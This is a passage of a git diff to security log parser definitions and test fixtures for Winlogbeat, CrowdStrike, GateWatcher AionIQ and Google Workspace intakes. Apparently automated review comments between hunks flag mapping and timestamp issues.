enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 
(WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4798", + "kind": "event", + "module": "security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:25:34.741000Z", + "action": { + "id": 4798, + "outcome": "success", + "properties": { + "CallerProcessId": "0x123", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACC0123$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "ACC0123", + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest" + } + }, + "agent": { + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "ACC0123", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "hostname", + "os": { + "build": "20348.169", + "family": "windows", + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACC0123" + ] + }, + "user": { + "domain": "DOMAIN", 
+ "id": "S-1-2-3", + "name": "ACC0123", + "target": { + "domain": "ACC0123", + "name": "Guest" + } + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACC0123.johndoe.com", + "event_id": "4798", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1524672", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json index cde1d5c3c..8413484f9 100644 --- a/Beats/winlogbeat/tests/security_event_5140.json +++ b/Beats/winlogbeat/tests/security_event_5140.json @@ -93,11 +93,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json index 99a17d54f..ec1e78d54 100644 --- a/Beats/winlogbeat/tests/security_event_5145.json +++ b/Beats/winlogbeat/tests/security_event_5145.json @@ -96,13 +96,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index 75e1b7434..a59b68006 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml 
@@ -1,8 +1,3 @@ -crowdstrike.base_filename: - description: Base Filename - name: crowdstrike.base_filename - type: keyword - crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index 03e9819e7..5d0069c0a 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,9 +53,6 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" - - set: - crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" - set_registry_fields: actions: - set: @@ -180,9 +177,9 @@ stages: - set: "event.action": "{{parsed_event.message.event_simpleName}}" - "process.command_line": "{{parsed_event.message.CommandLine}}" + "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}" "process.executable": "{{parsed_event.message.ImageFileName}}" - "process.name": "{{parsed_event.message.ImageFileName | basename}}" + "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}" "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}" "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}" "process.parent.pid": "{{parsed_event.message.ParentProcessId}}" diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 1e7368eee..01e9a933f 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,7 +18,6 @@ "id": "111111111111111" }, "crowdstrike": { - "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { 
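Review bot: Removing `crowdstrike.base_filename` from fields.yml (and its `set` in parser.yml, hunk `@@ -53,9 +53,6 @@`) retires a field that existing detection rules and saved searches may reference, and nothing in the diff marks it as deprecated or states where the value now lands. If the field is intentionally retired, a release note for this intake should say that `ContextBaseFileName` is now surfaced through `process.name`; otherwise keep the assignment in place alongside the new mapping for a transition period so rules keyed on the old field keep matching.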
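Review bot: `process.command_line` now falls back to `ContextBaseFileName`, so an event without a `CommandLine` gets a bare executable name in a field consumers read as the full invocation (the updated telemetry_event_26 test pins `"command_line": "svchost.exe"`). Detections that inspect command-line arguments would then match or skip on a value that never was a command line; keeping the fallback for `process.name` only and leaving `process.command_line` unset when `CommandLine` is absent avoids that ambiguity: `"process.command_line": "{{parsed_event.message.CommandLine}}"`. The enclosing `set` action continues past the hunk.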
@@ -34,6 +33,10 @@ "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index d0d85f7f6..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -385,11 +385,20 @@ gatewatcher.tlp: type: text gatewatcher.tls: - description: This field represents the tls field in a network metadata (used in - legacy format log) + description: This field contains all TLS data fields in a TLS metadata name: gatewatcher.tls type: text +gatewatcher.tls_fingerprint: + description: This field represents the TLS server fingerprint field in a TLS metadata + name: gatewatcher.tls_fingerprint + type: text + +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 45330587a..845abe396 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -10,7 +10,7 @@ pipeline: external: name: date.parse properties: - input_field: "{{json_load.message.timestamp_analyzed}}" + input_field: "{{json_load.message.timestamp_detected}}" output_field: datetime format: null timezone: UTC @@ -29,6 +29,8 @@ pipeline: description: DGA - name: retrohunt description: Retrohunt + - name: tls + description: TLS stages: common: actions: @@ -122,7 +124,6 @@ stages: gatewatcher.sip: "{{json_load.message.sip}}" gatewatcher.smb: "{{json_load.message.smb}}" gatewatcher.ssh: "{{json_load.message.ssh}}" - gatewatcher.tls: "{{json_load.message.tls}}" file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" gatewatcher.dhcp: "{{json_load.message.dhcp}}" gatewatcher.dnp3: "{{json_load.message.dnp3}}" 
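Review bot: Switching the date source to `timestamp_detected` leaves events that carry only `timestamp_analyzed` without a source-derived timestamp: the new sigflow-tls sample later in this diff has `timestamp_analyzed` and `timestamp` but no `timestamp_detected`, and its expected output contains no `@timestamp` at all, which undermines timeline reconstruction and time-window correlation for those events. A fallback covers both cases: `input_field: "{{json_load.message.timestamp_detected or json_load.message.timestamp_analyzed}}"` — the `or` form is already used by this diff's CrowdStrike parser. The `date.parse` step begins before the hunk.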
@@ -202,3 +203,16 @@ stages: gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}" gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}" gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}" + tls: + actions: + - set: + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json index f16f95623..6d7eb789a 100644 --- a/GateWatcher/aioniq/tests/codebreaker.json +++ b/GateWatcher/aioniq/tests/codebreaker.json @@ -17,7 +17,7 @@ "module": "powershell", "severity": 1 }, - "@timestamp": "2023-03-22T10:32:50.269000Z", + "@timestamp": "2023-03-22T10:30:37.145000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index b9db082ca..9d702ce4d 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json @@ -17,7 +17,7 @@ "module": "dga", "severity": 1 }, - "@timestamp": "2023-03-22T10:46:08.487000Z", + "@timestamp": "2023-03-22T10:25:54.903000Z", "destination": { "address": "pgoadcmgqfacj.com", "domain": "pgoadcmgqfacj.com", diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index ba95cc211..b5d0a4f69 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json 
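Review bot: `gatewatcher.tls` is now assigned only inside the new `tls` stage while hunk `@@ -122,7 +124,6 @@` removes it from `common`, so a non-`tls` event that still carries a `tls` block (the field's previous description referred to the legacy network-metadata format) silently loses that data. If that is intended, the new description for `gatewatcher.tls` should state that it is populated for TLS metadata events only; if not, keep the `common` assignment and let the `tls` stage add only the `tls.server.*` fields. `tls.server.not_before` and `tls.server.not_after` receive the raw `notbefore`/`notafter` strings, so it is worth confirming their format matches the ECS date mapping for those fields.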
@@ -20,7 +20,7 @@ "info" ] }, - "@timestamp": "2023-03-22T10:53:13.408000Z", + "@timestamp": "2023-03-22T10:35:22.615000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json index fd29bcfa4..7c8728304 100644 --- a/GateWatcher/aioniq/tests/retrohunt.json +++ b/GateWatcher/aioniq/tests/retrohunt.json @@ -17,7 +17,7 @@ "module": "retrohunt", "severity": 1 }, - "@timestamp": "2023-06-12T10:12:39.001000Z", + "@timestamp": "2023-06-09T14:08:46.845000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json index 1de9534f5..626ee8eb7 100644 --- a/GateWatcher/aioniq/tests/sigflow-alert.json +++ b/GateWatcher/aioniq/tests/sigflow-alert.json @@ -19,7 +19,7 @@ "module": "alert", "severity": 1 }, - "@timestamp": "2023-03-22T10:44:08.001000Z", + "@timestamp": "2023-03-22T10:25:55.690000Z", "destination": { "address": "2.2.2.2", "bytes": 90364, diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json index 2e1580dce..7e9cc8b6a 100644 --- a/GateWatcher/aioniq/tests/sigflow-file.json +++ b/GateWatcher/aioniq/tests/sigflow-file.json @@ -16,7 +16,7 @@ ], "module": "fileinfo" }, - "@timestamp": "2023-03-22T10:44:07.998000Z", + "@timestamp": "2023-03-22T10:25:55.469000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json index 4da5dbc30..6e8cba037 100644 --- a/GateWatcher/aioniq/tests/sigflow-meta.json +++ b/GateWatcher/aioniq/tests/sigflow-meta.json @@ -16,7 +16,7 @@ ], "module": "http" }, - "@timestamp": "2023-03-22T10:44:07.997000Z", + "@timestamp": "2023-03-22T10:25:55.377000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", 
diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json new file mode 100644 index 000000000..ff8624608 --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-tls.json 
@@ -0,0 +1,68 @@ +{ + "input": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ v102", + "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26" + } + } + }, + "expected": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "event": { + "category": [ + "network" + ], + "module": "tls" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "gatewatcher": { + "event_type": "tls", + "flow_id": "1366008699485799", 
+ "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}", + "tls_sni": "www.microsoft.com", + "type": "suricata" + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "82:df:ee:4f:81:af", + "e6:43:7e:91:1b:92" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxxx.domain.local" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 64809 + }, + "tls": { + "server": { + "ja3s": "15af977ce25de452b96affa2addb1036" + }, + "version": "TLS 1.3" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..a8ee3a54d 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -1,3 +1,8 @@ +google.report.access.application: + description: Application name + name: google.report.access.application + type: keyword + google.report.actor.email: description: '' name: google.report.actor.email 
@@ -33,6 +38,46 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword +google.report.rule.data_source: + description: Data source + name: google.report.rule.data_source + type: keyword + +google.report.rule.name: + description: Name of the rule + name: google.report.rule.name + type: keyword + +google.report.rule.scan_type: + description: Scan type + name: google.report.rule.scan_type + type: keyword + +google.report.rule.severity: + description: Severity of the rule + name: google.report.rule.severity + type: keyword + +google.report.rule.type: + description: Rule type + name: google.report.rule.type + type: keyword + +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name + type: keyword + +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator + type: keyword + +google.report.saml.status_code: + description: SAML response status + name: google.report.saml.status_code + type: keyword + google.report.token.app_name: description: Token authorization application name name: google.report.token.app_name diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..4633f32de 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json 
@@ -168,6 +168,273 @@ } ] }, + { + "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}", + "conditions": [ + { + "field": "network.application", + "value": "context_aware_access" + }, + { + "field": "google.report.access.application" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + } + ] + }, + { + "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "action_complete" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "The {google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "content_matched" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + }, + { + "field": "google.report.saml.status_code" + } + ] + }, + { + "value": "User {user.email} successfully logged in 
by {network.application} from {google.report.saml.application_name}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "field": "device.model.name" + }, + { + "field": "device.model.identifier" + } + ] + }, + { + 
"value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGOUT_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..4f5192ea6 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -1,4 +1,5 @@ name: google-report +ignored_values: ["UNKNOWN"] pipeline: - name: json_event external: 
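Review bot: The `login_failure` entry whose value interpolates `{event.reason}` appears twice, word for word, and neither copy requires `event.reason` in its conditions (both require `google.report.saml.application_name`, which the value never uses), so the description can render with an empty reason while the duplicate adds nothing. The third `CHROME_OS_LOGIN_EVENT` entry interpolates `{host.name}` but conditions on `device.model.name`, making it indistinguishable from the entry before it; it should condition on `{ "field": "host.name" }` instead. Smaller points in the same hunk: the first entry's value begins with a leading space (`" Access to …"`), and the second `login_success` entry lists `event.action` twice in its conditions.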
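Review bot: `ignored_values: ["UNKNOWN"]` is declared at parser level, so it drops every field whose value is exactly `UNKNOWN` for all applications, not only the `CAA_DEVICE_ID` placeholder the new context-aware test relies on (its expected output has no `device.id`). A field such as `event.reason` or a SAML `failure_type` that genuinely reports `UNKNOWN` would vanish from the event as well, which an analyst could misread as the source having sent no reason. A short comment above the line recording the motivation, e.g. `# Google reports use "UNKNOWN" as a placeholder (e.g. CAA_DEVICE_ID); this applies to every mapped field`, would let the next maintainer judge the trade-off.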
@@ -28,6 +29,14 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_context_aware_fields + filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}' + - name: set_rules_fields + filter: '{{ json_event.message.id.applicationName == "rules"}}' + - name: set_saml_fields + filter: '{{ json_event.message.id.applicationName == "saml"}}' + - name: set_chrome_fields + filter: '{{ json_event.message.id.applicationName == "chrome"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -157,6 +166,8 @@ stages: network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}' google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}' + user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}' + source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}' set_groups_enterprise_fields: actions: 
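Review bot: `user.email` is filled from the `organizer_email` parameter, which names the meeting organizer rather than the acting user; elsewhere in this intake the actor's address comes from `actor.email` (see `google.report.actor.email` and `user.email` in the new test_access_sample_1 expected output), so this assignment can misattribute a meet event to the organizer when the actor is another participant. Unless this stage is only reached for events without an actor email, a dedicated field (for example a `google.report.meet.organizer_email` declared in fields.yml) would preserve the organizer without overloading `user.email`. The enclosing `set` action starts before the hunk.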
@@ -258,3 +269,69 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_context_aware_fields: + actions: + - set: + event.type: ["denied"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' + google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' + + set_rules_fields: + actions: + - set: + google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["info"] + filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}' + + - set: + event.type: ["deletion"] + filter: '{{ json_event.message.events[0].name == "label_removed"}}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}' + + set_saml_fields: + actions: + - set: + event.category: ["authentication"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" 